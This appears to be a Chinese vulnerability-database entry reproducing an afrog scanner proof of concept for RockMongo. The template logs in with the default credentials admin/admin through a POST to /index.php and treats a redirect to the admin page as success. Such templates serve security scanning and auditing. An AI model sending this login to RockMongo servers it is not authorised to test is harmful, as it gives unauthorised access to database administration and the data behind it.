rockmongo-default-password: Rockmongo Default Password

日期: 2025-08-01 | 影响软件: RockMongo | POC: 已公开

漏洞描述

app="RockMongo"

PoC代码[已公开]

id: rockmongo-default-password

info:
  name: Rockmongo Default Password
  author: B1anda0
  severity: high
  verified: true
  description: |-
    app="RockMongo"
  tags: rockmongo,default-password
  created: 2023/10/30

rules:
  r0:
    request:
      method: POST
      path: /index.php?action=login.index&host=0
      body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
    expression: response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/rockmongo-default-password.yaml

相关漏洞推荐